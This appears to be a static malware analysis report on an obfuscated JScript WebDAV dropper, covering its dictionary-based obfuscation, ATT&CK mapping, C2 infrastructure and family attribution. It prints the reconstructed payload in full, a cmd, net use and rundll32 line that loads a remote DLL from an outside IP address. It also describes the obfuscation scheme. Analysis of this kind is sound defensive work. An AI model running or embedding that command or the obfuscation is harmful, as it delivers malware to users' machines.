8821c53f677a1d84b8389c328e0e3d5966d320eece827fef890d217936685e9cStatic Deep-Dive — 8821c53f677a1d84b8389c328e0e3d5966d320eece827fef890d217936685e9c
Classification: unclassified-js-webdav-dropper (96th confirmed sibling)
Build / RE
- Language: JScript (Windows Script Host). Single-line file, 1,163,325 bytes. ^[file.txt]
- Obfuscation: JScript dictionary lookup table — extreme variable-name padding (2,500-char keys). 62 key/value pairs mapping single-character values to random-noise dictionary keys averaging 2,500 characters each (range 2,059–3,999). Keys are fully random lowercase ASCII strings with no semantic content. Values are single printable characters assigned via
dict['noisykey']='X'. - Assembly engine:
Function('return this')()— theFunctionconstructor receives a concatenated string built from sequential dictionary lookups (132 lookups, 33 unique keys reused with last-wins semantics), evaluates toreturn this, thenthisresolves to the global object where.WScript.CreateObject(...)is available. - Payload reconstruction (manual):
Reconstructed via ordered key extraction from thethis.WScript.CreateObject('WScript.Shell') .run('cmd /c net use \\\\.\\DavWWWRoot\\94.159.113.82@8888\\ && rundll32 \\\\.\\DavWWWRoot\\94.159.113.82@8888\\16654515422584.dll,Entry')Function(...)call body. 132 sequential dictionary lookups resolve toreturnthisWScriptCreateObjectWScriptShellruncmdcnetuse94159113828888davwwwrootrundll3294159113828888davwwwroot16654515422584dllEntry; interleaved literal strings (' ','/','\\','@','&','.',',') separate tokens and form the full command line. Noeval()used; theFunctionconstructor is the sole deobfuscation primitive. - Anti-analysis: None — no debugger checks, no VM detection, no time gates, no connectivity checks.
- Code quality: Low — hand-written noise-obfuscation, repetitive, no commercial obfuscator signatures.
Deploy / ATT&CK
| Tactic | Technique | Evidence |
|---|---|---|
| Execution | T1059.005 (Visual Basic / JScript) | .js file executed by WScript; WScript.CreateObject and WScript.Shell APIs |
| Execution | T1059.003 (Windows Command Shell) | cmd /c prefix in Shell.run() argument |
| Execution | T1218.011 (Rundll32) | rundll32 \\\\.\\DavWWWRoot\\94.159.113.82@8888\\16654515422584.dll,Entry |
| Defense Evasion | T1218 (System Binary Proxy Execution) | rundll32 is a signed system binary |
| Defense Evasion | T1027 (Obfuscated Files or Information) | 62-entry noise-key dictionary obfuscation with 2,500-char keys |
| Command & Control | T1071.001 (Web Protocols) | WebDAV over HTTP via UNC path \\94.159.113.82@8888\\DavWWWRoot\\ |
| Command & Control | T1105 (Ingress Tool Transfer) | net use mounts WebDAV share; rundll32 fetches and loads remote DLL |
Infrastructure: C2 94.159.113.82:8888 (same /24 subnet as 65 prior siblings: .80, .82, .84, .86, .204). Payload DLL name 16654515422584.dll.
Notable absence: No PowerShell wrapper (-EncodedCommand or -windowstyle hidden), no wordpad decoy, no timeout anti-emulation gate, no regsvr32 /s — this sample uses only rundll32 ...,Entry. The smallest execution footprint observed in the family to date.
Attribution: Same actor/toolchain as unclassified-js-webdav-dropper. Extreme variable-name padding (2,500 chars) is a new size class within the existing noise-dictionary dialect. No new TTPs; this is an infrastructure-rotation + obfuscation-resize sibling.